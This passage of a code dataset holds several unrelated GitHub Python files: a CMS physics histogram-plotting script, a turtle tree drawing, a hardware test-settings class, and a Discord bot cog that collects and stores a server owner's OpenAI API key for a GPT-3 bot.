event.Flag_HBHENoiseIsoFilter_fired==1 and event.Flag_globalTightHalo2016Filter_fired==1 and event.Flag_goodVertices_fired==1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired==1:\n return True\n#########################################################################\n\ncolors = [ROOT.kRed, ROOT.kBlue, ROOT.kMagenta, ROOT.kCyan, ROOT.kOrange, ROOT.kSpring, ROOT.kTeal, ROOT.kAzure, ROOT.kPink, ROOT.kYellow]\nchannels = [\"eTau\", \"diTau\"]\nvariables = [\"pt_1\", \"pt_2\", \"dR\", \"pth\", \"m_vis\", \"mt12\", \"npv\", \"mt_1\", \"mt_2\", \"njets\", \"jpt_1\", \"jpt_2\", \"tauDecayMode\", \"nIsoNeutral\"]\n\n\nfor j in range(0, 2):\n for k in range(0, 14):\n channel = channels[j]\n variable = variables[k]\n\n if channel == 
\"diTau\":\n label = \"#tau_{h}#tau_{h} \"\n if channel == \"muTau\":\n label = \"#mu#tau_{h} \"\n if channel == \"eTau\":\n label = \"e#tau_{h} \"\n\n xaxis = variable\n ratioplot = \"n\"\n if variable == \"pt_1\":\n topbin = 200\n bottombin = 0\n binnumber = 20\n if variable == \"pt_2\":\n topbin = 200\n bottombin = 0\n binnumber = 20\n if variable == \"dR\":\n topbin = 2 \n bottombin = 0\n binnumber = 20\n if variable == \"pth\":\n topbin = 350\n bottombin = 100\n binnumber = 25\n if variable == \"m_vis\":\n topbin = 120\n bottombin = 0\n binnumber = 25\n if variable == \"mt12\":\n topbin = 200\n bottombin = 0\n binnumber = 20\n if variable == \"npv\":\n topbin =80\n bottombin =0\n binnumber =30\n if variable == \"mt_1\":\n topbin = 250\n bottombin = 0\n binnumber = 25\n if variable == \"mt_2\":\n topbin = 250\n bottombin = 0\n binnumber = 25\n if variable == \"njets\":\n topbin = 7\n bottombin = 0\n binnumber = 8\n if variable == \"jpt_1\":\n topbin = 500\n bottombin = 0\n binnumber = 25\n if variable == \"jpt_2\":\n topbin = 500\n bottombin = 0\n binnumber = 25\n if variable == \"tauDecayMode\":\n topbin = 10\n bottombin = 0\n binnumber = 10\n if variable == \"nIsoNeutral\":\n topbin = 5\n bottombin = 0\n binnumber = 20\n\n\n\n\n\n #set the tdr style \n tdrstyle.setTDRStyle()\n ROOT.gStyle.SetOptStat(2210)\n ROOT.gStyle.SetTitleAlign(13)\n\n #change the CMS_lumi variables (see CMS_lumi.py) \n CMS_lumi.lumi_13TeV =str(label)+ \"35.9 fb^{-1}\"\n CMS_lumi.writeExtraText = 1\n CMS_lumi.extraText = \"Preliminary\"\n CMS_lumi.lumi_sqrtS = \"13 TeV\" \n # used with iPeriod = 0, e.g. for simulation-only plots (default is an empty string) \n iPos = 11\n if( iPos==0 ): CMS_lumi.relPosX = 0.12\n H_ref = 800;\n W_ref = 800;\n W = W_ref\n H = H_ref\n iPeriod = 4\n # references for T, B, L, R \n T = 0.08*H_ref\n B = 0.12*H_ref\n L = 0.12*W_ref\n R = 0.04*W_ref\n B_ratio = 0.1*H_ref\n T_ratio = 0.03*H_ref\n B_ratio_label = 0.3*H_ref\n canvas1 = ROOT.TCanvas(\"c2\",\"c2\",50,50,W,H)\n canvas1.SetFillColor(0)\n canvas1.SetBorderMode(0)\n canvas1.SetFrameFillStyle(0)\n canvas1.SetFrameBorderMode(0)\n canvas1.SetTickx(0)\n canvas1.SetTicky(0)\n stacks1 = ROOT.THStack(\"stacks1\",\"\")\n x1_l = 0.93\n y1_l = 0.90\n dx_l = 0.38\n dy_l = 0.20\n x0_l = x1_l-dx_l\n y0_l = y1_l-dy_l\n\n\n if (ratioplot != \"y\"):\n canvas1.SetLeftMargin( L/W )\n canvas1.SetRightMargin( R/W )\n canvas1.SetTopMargin( T/H )\n canvas1.SetBottomMargin( B/H )\n\n\n canvas1.cd()\n\n if (ratioplot == \"y\"):\n plotPad = ROOT.TPad(\"plotpad\",\"\",0.0,0.3,1.0,1.0)\n plotPad.SetLeftMargin(L/W)\n plotPad.SetRightMargin(R/W)\n plotPad.SetTopMargin(T/H)\n plotPad.SetBottomMargin(B_ratio/H)\n plotPad.SetFillColor(0)\n plotPad.SetBottomMargin(0)\n\n ratioPad = ROOT.TPad(\"ratioPad\",\"\",0.0,0.0,1.0,0.31)\n ratioPad.SetLeftMargin(L/W)\n ratioPad.SetRightMargin(R/W)\n ratioPad.SetTopMargin(T_ratio/H)\n ratioPad.SetBottomMargin(B_ratio_label/H)\n ratioPad.SetGridy(1)\n ratioPad.SetFillColor(4000)\n\n if (ratioplot != \"y\"):\n plotPad = ROOT.TPad(\"plotPad\",\"\",0.0,0.0,1.0,1.0)\n plotPad.SetLeftMargin(L*1.4/W)\n plotPad.SetRightMargin(R/W)\n plotPad.SetTopMargin(T/H)\n plotPad.SetBottomMargin(B/H)\n\n plotPad.Draw()\n plotPad.cd()\n\n\n\n####################################### \n legend = ROOT.TLegend(x0_l,y0_l,x1_l, y1_l,\"\",\"brNDC\")\n legend.SetFillColor(ROOT.kWhite)\n legend.SetBorderSize(1)\n\n histo = {str(0):ROOT.TH1F(\"histo0\",title,int(binnumber),float(bottombin),float(topbin)), 
str(1):ROOT.TH1F(\"histo1\",title,int(binnumber),float(bottombin),float(topbin)), str(2):ROOT.TH1F(\"histo2\",title,int(binnumber),float(bottombin),float(topbin)), str(3):ROOT.TH1F(\"histo3\",title,int(binnumber),float(bottombin),float(topbin)), str(4):ROOT.TH1F(\"histo4\",title,int(binnumber),float(bottombin),float(topbin)), str(5):ROOT.TH1F(\"histo5\",title,int(binnumber),float(bottombin),float(topbin)), str(6):ROOT.TH1F(\"histo6\",title,int(binnumber),float(bottombin),float(topbin)), str(7):ROOT.TH1F(\"histo7\",title,int(binnumber),float(bottombin),float(topbin)), str(8):ROOT.TH1F(\"histo8\",title,int(binnumber),float(bottombin),float(topbin)), str(9):ROOT.TH1F(\"histo9\",title,int(binnumber),float(bottombin),float(topbin))}\n\n\n signal = ROOT.TH1F(\"signal\",title, int(binnumber),float(bottombin), float(topbin))\n signalfile = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/ZpBaryonic_Zp1000_MChi150.root\")\n\n################################################ \n\n\n if channel == \"muTau\":\n signaltree = signalfile.Get(\"muTauEventTree/eventTree\")\n for event in signaltree:\n g = getattr(event, variable)\n zptweight = getattr(event, \"ZPt_reweight\")\n wptweight = getattr(event, \"WPt_reweight\")\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n pogid1 = getattr(event, \"POGid1\")\n pogtrigger = getattr(event, \"POGtrigger\")\n tauid1 = getattr(event, \"TAUID1\")\n trackweight = getattr(event, \"trackweight\")\n if muTauCutTester(event):\n signal.Fill(g, 35870*zptweight*wptweight*weight*genweight*puweight*pogid1*pogtrigger*tauid1*trackweight)\n if channel == \"eTau\":\n signaltree = signalfile.Get(\"eleTauEventTree/eventTree\")\n for event in signaltree:\n g = getattr(event, variable)\n zptweight = getattr(event, \"ZPt_reweight\")\n wptweight = getattr(event, \"WPt_reweight\")\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n tauid1 = getattr(event, \"TAUID1\")\n idisoweight = getattr(event, \"idisoweight_REDO\")\n trigweight = getattr(event, \"trigweight_REDO\")\n trackweight = getattr(event, \"trackweight\")\n if eleTauCutTester(event):\n signal.Fill(g, 35870*zptweight*wptweight*weight*genweight*puweight*tauid1*idisoweight*trigweight*trackweight)\n if channel == \"diTau\":\n signaltree = signalfile.Get(\"diTauEventTree/eventTree\")\n for event in signaltree:\n g = getattr(event, variable)\n zptweight = getattr(event, \"ZPt_reweight\")\n wptweight = getattr(event, \"WPt_reweight\")\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n trigweight = getattr(event, \"trigweight_REDO\")\n tauid1 = getattr(event, \"TAUID1\")\n if diTauCutTester(event):\n signal.Fill(g, 35870*zptweight*wptweight*weight*genweight*puweight*trigweight*tauid1)\n\n\n signal.SetLineColor(ROOT.kRed)\n\n\n\n if channel == \"muTau\":\n datafile1 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAB.root\")\n datafile2 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAC.root\")\n datafile3 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAD.root\")\n datafile4 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAE.root\")\n datafile5 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAF.root\")\n datafile6 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAG.root\")\n datafile7 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAH2.root\")\n datafile8 = 
ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAH3.root\")\n if channel == \"eTau\":\n datafile1 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAB.root\")\n datafile2 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAC.root\")\n datafile3 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAD.root\")\n datafile4 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAE.root\")\n datafile5 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAF.root\")\n datafile6 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAG.root\")\n datafile7 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAH2.root\")\n datafile8 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAH3.root\")\n if channel == \"diTau\":\n datafile1 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAB.root\")\n datafile2 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAC.root\")\n datafile3 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAD.root\")\n datafile4 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAE.root\")\n datafile5 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAF.root\")\n datafile6 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAG.root\")\n datafile7 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAH2.root\")\n datafile8 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAH3.root\")\n\n\n\n\n\n data = ROOT.TH1F(\"data\",title,int(binnumber),float(bottombin),float(topbin))\n if channel == \"muTau\":\n datatree = datafile1.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile1.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile1.Get(\"diTauEventTree/eventTree\")\n q=0\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 1: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile2.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile2.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile2.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel == \"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel == \"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 2: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile3.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile3.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile3.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 3: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile4.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = 
datafile4.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile4.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 4: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile5.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile5.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile5.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 5: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile6.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile6.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile6.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 6: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile7.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile7.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile7.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 7: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile8.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile8.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile8.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 8: \"+str(q))\n\n\n\n data.SetMarkerStyle(20)\n data.SetMarkerSize(1.0)\n data.SetLineColor(ROOT.kBlack)\n\n\n\n for i in range(0, int(filenumber)):\n ntuple_file = ROOT.TFile(infile[i])\n print (channel)\n if channel == \"muTau\":\n tree = ntuple_file.Get(\"muTauEventTree/eventTree\")\n if channel == \"eTau\":\n tree = ntuple_file.Get(\"eleTauEventTree/eventTree\")\n if channel == \"diTau\":\n tree = ntuple_file.Get(\"diTauEventTree/eventTree\")\n for event in tree:\n g = getattr(event, variable)\n 
zptweight = getattr(event, \"ZPt_reweight\")\n                wptweight = getattr(event, \"WPt_reweight\")\n                if channel == \"muTau\":\n                    weight = getattr(event, \"__WEIGHT__\")\n                    genweight = getattr(event, \"GENWEIGHT\")\n                    puweight = getattr(event, \"puweight\")\n                    pogid1 = getattr(event, \"POGid1\")\n                    pogtrigger = getattr(event, \"POGtrigger\")\n                    tauid1 = getattr(event, \"TAUID1\")\n                    trackweight = getattr(event, \"trackweight\")\n                    if muTauCutTester(event):\n                        histo[str(i)].Fill(g, weight*genweight*puweight*pogid1*pogtrigger*tauid1*trackweight*35.9*1000*zptweight*wptweight)\n                if channel == \"eTau\":\n                    weight = getattr(event, \"__WEIGHT__\")\n                    genweight = getattr(event, \"GENWEIGHT\")\n                    puweight = getattr(event, \"puweight\")\n                    tauid1 = getattr(event, \"TAUID1\")\n                    idisoweight = getattr(event, \"idisoweight_REDO\")\n                    trigweight = getattr(event, \"trigweight_REDO\")\n                    trackweight = getattr(event, \"trackweight\")\n                    if eleTauCutTester(event):\n                        histo[str(i)].Fill(g, weight*genweight*puweight*tauid1*idisoweight*trigweight*trackweight*35.9*1000*zptweight*wptweight)\n                if channel == \"diTau\":\n                    weight = getattr(event, \"__WEIGHT__\")\n                    genweight = getattr(event, \"GENWEIGHT\")\n                    puweight = getattr(event, \"puweight\")\n                    trigweight = getattr(event, \"trigweight_REDO\")\n                    tauid1 = getattr(event, \"TAUID1\")\n                    if diTauCutTester(event):\n                        histo[str(i)].Fill(g, weight*genweight*puweight*trigweight*tauid1*35.9*1000*zptweight*wptweight)\n        \n\n\n        i = 0\n\n        for q in range(0,int(filenumber)):\n            histo[str(q)].SetFillColor(colors[q])\n            histo[str(q)].SetLineColor(ROOT.kBlack)\n            legend.AddEntry(histo[str(q)], legend_title[q],\"f\")\n\n        legend.AddEntry(signal, \"Signal\", \"l\")\n        legend.AddEntry(data, \"Observed\",\"P\")\n        \n\n        for w in range(0, int(filenumber)):\n            stacks1.Add(histo[str(w)])\n\n\n        canvas1.SetLogy()\n        stacks1.Draw(\"HIST\")\n        signal.Draw(\"HIST SAME\")\n\n        if (data.GetMaximum() > stacks1.GetMaximum()):\n            stacks1.SetMaximum(data.GetMaximum()*1.4)\n        if (data.GetMaximum() <= stacks1.GetMaximum()):\n            stacks1.SetMaximum(stacks1.GetMaximum()*1.4)\n\n        data.Draw(\"e,SAME\")\n        CMS_lumi.CMS_lumi(canvas1, iPeriod, iPos)\n        stacks1.GetXaxis().SetTitle(xaxis)\n        stacks1.GetXaxis().SetLabelSize(0.035)\n        \n\n        \n        canvas1.Modified()\n        canvas1.cd()\n        canvas1.Update()\n        canvas1.RedrawAxis()\n        frame = canvas1.GetFrame()\n        frame.Draw()\n\n        legend.Draw(\"same\")\n        saveas = saveWhere+channel+variable+'.png'\n        canvas1.Update()\n        canvas1.SaveAs(saveas)\n        canvas1\n\n        signalfile.Close()\n        datafile1.Close()\n        datafile2.Close()\n        datafile3.Close()\n        datafile4.Close()\n        datafile5.Close()\n        datafile6.Close()\n        datafile7.Close()\n        datafile8.Close()\n        ntuple_file.Close()\n","repo_name":"marctost/CMS-files","sub_path":"makeplots.py","file_name":"makeplots.py","file_ext":"py","file_size_in_byte":25391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34974329970","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom turtle import *  # load the turtle functions\n\ndef tree(length):\n    # function that draws a tree\n    if length > 5:\n        forward(length)\n        right(20)\n        tree(length-15)\n        left(40)\n        tree(length-15)\n        right(20)\n        backward(length)\n\ncolor(\"green\")  # make the cursor color green\nleft(90)  # rotate 90 degrees to the left so the cursor points up\nbackward(150)  # move down\ntree(120)  # call the tree-drawing function\n\ninput('type to exit')  # wait for input after the drawing finishes\n","repo_name":"gstatsr94/python_study","sub_path":"Chapter01/draw_tree.py","file_name":"draw_tree.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9231180465","text":"from .camera_settings import CameraSettings\nfrom .parameter import Parameter\nfrom .serial_port_settings import SerialPortSettings\n\n\nclass TestSettings:\n\n    _cam: list[CameraSettings] = []\n    _sp: list[SerialPortSettings] = []\n    _cam_display = None\n    _cam_leds = None\n    _sp_main = None\n    _sp_usb = None\n\n    @staticmethod\n    def get_cam_display():\n        return TestSettings._cam_display\n\n    @staticmethod\n    def set_cam_display(name: str):\n        cam_index = TestSettings.get_index_cam(name)\n        if cam_index == -1:\n            return -1\n        else:\n            TestSettings._cam_display = TestSettings._cam[cam_index]\n\n    @staticmethod\n    def get_cam_leds():\n        return TestSettings._cam_leds\n\n    @staticmethod\n    def set_cam_leds(name: str):\n        cam_index = TestSettings.get_index_cam(name)\n        if cam_index == -1:\n            # TODO: Error Code\n            return -1\n        else:\n            TestSettings._cam_leds = TestSettings._cam[cam_index]\n\n    @staticmethod\n    def get_sp_main():\n        return TestSettings._sp_main\n    \n    @staticmethod\n    def set_sp_main(name: str):\n        sp_index = TestSettings.get_index_sp(name)\n        if sp_index == -1:\n            # TODO: Error code\n            return -1\n        TestSettings._sp_main = TestSettings._sp[sp_index]\n\n    @staticmethod\n    def add_new_sp_settings(name: str, port: str, baudrate: int):\n        TestSettings._sp.append(SerialPortSettings(name, port, baudrate))\n\n    @staticmethod\n    def get_index_sp(name: str):\n        for i in range(len(TestSettings._sp)):\n            sp_name = TestSettings._sp[i].get_name()\n            if(sp_name == name):\n                return i\n        return -1\n    \n    @staticmethod\n    def get_sp(name: str):\n        index = TestSettings.get_index_sp(name)\n        if index == -1:\n            return None\n        else:\n            return TestSettings._sp[index]\n    \n    @staticmethod\n    def delete_sp_settings(name: str):\n        sp_index = TestSettings.get_index_sp(name)\n        if sp_index != -1:\n            TestSettings._sp.pop(sp_index)\n\n    @staticmethod\n    def add_new_cam_settings(settings: CameraSettings):\n        TestSettings._cam.append(settings)\n\n    @staticmethod\n    def get_index_cam(name: str):\n        for i in range(len(TestSettings._cam)):\n            cam_name = TestSettings._cam[i].get_name()\n            if(cam_name == name):\n                return i\n        return -1\n    \n    @staticmethod\n    def get_cam(name: str):\n        index = TestSettings.get_index_cam(name)\n        if index == -1:\n            return None\n        else:\n            return TestSettings._cam[index]\n\n    @staticmethod\n    def delete_cam_settings(name: str):\n        cam_index = TestSettings.get_index_cam(name)\n        if cam_index != -1:\n            TestSettings._cam.pop(cam_index)\n    ","repo_name":"whrovic/HMI_Test_System","sub_path":"src/main/python/com/hmi_test_system/data/hardware_settings/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40161214870","text":"import asyncio\n\nimport discord\nfrom discord.ext import commands\n\nfrom Errors.CreditExhaustedError import CreditExhaustedError\nfrom Errors.EmptyPromptError import EmptyPromptError\nfrom Errors.NotAdminError import NotAdminError\nfrom Helpers import user_parse\nfrom Helpers.Emojis import thumbs_up, complete\nfrom Helpers.Messages import help_message\nfrom Helpers.Wrappers import check_setup\nfrom Implementation.ApiClient import ApiClient\nfrom Implementation.DbHandler import DbHandler\nfrom Implementation.LoggingHandler import 
LoggingHandler\nfrom Prompts import language_map\n\n\nclass MainCog(commands.Cog):\n    def __init__(self,\n                 discord_bot: commands.Bot,\n                 db_handler: DbHandler,\n                 api_client: ApiClient,\n                 logger: LoggingHandler\n                 ):\n        self.__logger = logger.get_logger(\"main_cog\")\n        self.__bot = discord_bot\n        self.__db = db_handler\n        self.__api = api_client\n\n    @commands.Cog.listener()\n    async def on_command_error(self, ctx, error):\n        \"\"\"\n        From: https://gist.github.com/EvieePy/7822af90858ef65012ea500bcecf1612\n        \"\"\"\n\n        if hasattr(ctx.command, 'on_error'):\n            return\n        cog = ctx.cog\n        if cog:\n            if cog._get_overridden_method(cog.cog_command_error) is not None:\n                return\n        ignored = (commands.CommandNotFound,)\n        error = getattr(error, 'original', error)\n        if isinstance(error, ignored):\n            return\n        if isinstance(error, commands.DisabledCommand):\n            await ctx.send(f'{ctx.command} has been disabled.')\n        elif isinstance(error, commands.NoPrivateMessage):\n            try:\n                await ctx.author.send(f'{ctx.command} cannot be used in Private Messages.')\n            except discord.HTTPException:\n                pass\n        elif isinstance(error, commands.PrivateMessageOnly):\n            try:\n                await ctx.author.send(f'{ctx.command} can only be used in Private Messages.')\n            except discord.HTTPException:\n                pass\n\n    @commands.Cog.listener()\n    async def on_guild_join(self, guild):\n        owner_id = guild.owner_id\n        guild_id = guild.id\n        guild_name = guild.name\n        if not self.__db.find_server(guild_id):\n            self.__db.add_server({\n                \"server_id\": guild_id,\n                \"server_name\": guild_name,\n                \"owner_id\": owner_id,\n                \"api_token\": None,\n                \"response_length\": 100,\n                \"daily_allowance\": 100,\n                \"vips\": [owner_id],\n                \"users\": []\n            })\n        else:\n            self.__db.update_server_name_id(guild_id, guild_name, owner_id)\n\n    @commands.Cog.listener()\n    async def on_guild_remove(self, guild):\n        guild_id = guild.id\n        self.__db.delete_server(guild_id)\n\n    async def cog_before_invoke(self, ctx):\n        await ctx.message.add_reaction(thumbs_up)\n\n    async def cog_after_invoke(self, ctx):\n        await ctx.message.remove_reaction(thumbs_up, self.__bot.user)\n        await ctx.message.add_reaction(complete)\n\n    async def check_server_token(self, ctx):\n        guild_id = ctx.guild.id\n        return self.__db.check_server_token(guild_id)\n\n    @staticmethod\n    async def prompt_setup(ctx):\n        await ctx.send(\"Owner of this server hasn't configured the bot yet. If you're the owner, send this bot a DM \"\n                       \"with command !setup.\")\n\n    @staticmethod\n    async def empty_warning(ctx):\n        await ctx.send(\"Hey, no empty prompts!\")\n\n    @staticmethod\n    async def openai_down_warning(ctx):\n        await ctx.send(\"OpenAI seems to be down. This sometimes happens and is usually resolved within minutes.\")\n\n    @staticmethod\n    async def credit_warning(ctx):\n        user_id, user_name = user_parse(ctx)\n        await ctx.send(\"{}, your daily allowance is over. :cry:\".format(user_name))\n\n    @staticmethod\n    async def not_admin_warning(ctx):\n        user_id, user_name = user_parse(ctx)\n        await ctx.send(\"{}, this command is only usable by admins.\".format(user_name))\n\n    @commands.command()\n    async def help(self, ctx):\n        await ctx.send(help_message)\n\n    @commands.command()\n    @commands.dm_only()\n    async def setup(self, ctx):\n        user_id, user_name = user_parse(ctx)\n        owned_servers = self.__db.find_owned_servers(user_id)\n        if not len(owned_servers) > 0:\n            await ctx.send(\"You don't seem to own any servers that I'm on. 
If you think this is a mistake, kick the \"\n \"bot and add it again.\")\n return\n\n def check_token(m):\n return m.channel == ctx.channel\n\n owned_server = owned_servers[0]\n\n if len(owned_servers) > 1:\n message = \"\"\n for serv in owned_servers:\n message += \"[\" + str((owned_servers.index(serv) + 1)) + \"]\"\n message += \"server name:\" + serv[\"server_name\"]\n message += \", server id:\" + serv[\"server_id\"]\n message += \"\\n\"\n\n await ctx.send(\"I noticed that you're an admin on multiple servers. Please choose which server \"\n \"you'd like to setup.\"\n \"{}\".format(message)\n )\n try:\n msg = await self.__bot.wait_for(\"message\", check=check_token, timeout=60)\n choice = int(msg.content)\n owned_server = owned_servers[choice]\n except asyncio.TimeoutError:\n await ctx.send(\"Timeout has been reached. You can try again with !setup.\")\n return\n except (TypeError, ValueError):\n await ctx.send(\"Invalid value. Please select a number. (e.g. '1') You can try again with !setup.\")\n return\n\n await ctx.send(\"Important note: For this bot to function and process requests, it has to save your api key in \"\n \"a database. This means that if the bad guys somehow access it, they can use your token and \"\n \"even cause incurring charges. We cannot be held responsible for that and suggest you to host \"\n \"on your own. You can do so by visiting the public repo on github(\"\n \"github.com/e4c6/DiscordGPT-3). If that's not a concern for \"\n \"you, feel free to proceed. If you ever doubt something is going fishy, you should quickly \"\n \"regenerate your api token through the developer portal on beta.openai.com.\")\n\n server_id, server_name = owned_server[\"server_id\"], owned_server[\"server_name\"]\n await ctx.send(\"Hi {}, i see that you're the owner of {}. Now please send me your OpenAI api key within 60 \"\n \"seconds. (and \"\n \"nothing else).\\nIt should be visible to you on https://beta.openai.com/account/api-keys.\".format(\n user_name, server_name))\n\n try:\n msg = await self.__bot.wait_for(\"message\", check=check_token, timeout=60)\n except asyncio.TimeoutError:\n await ctx.send(\"Timeout has been reached. You can try again with !setup.\")\n return\n\n if not msg.content[0:3] == \"sk-\":\n await ctx.send(\"Your api token should start with the characters sk-. You can restart this process when \"\n \"you find it.\")\n return\n\n if len(msg.content) > 50:\n await ctx.send(\"Your key seems abnormally long... You can restart this process when \"\n \"you find the right key.\")\n return\n\n self.__db.set_server_token(server_id, msg.content)\n await ctx.send(\"Successfully set the token, enjoy! 
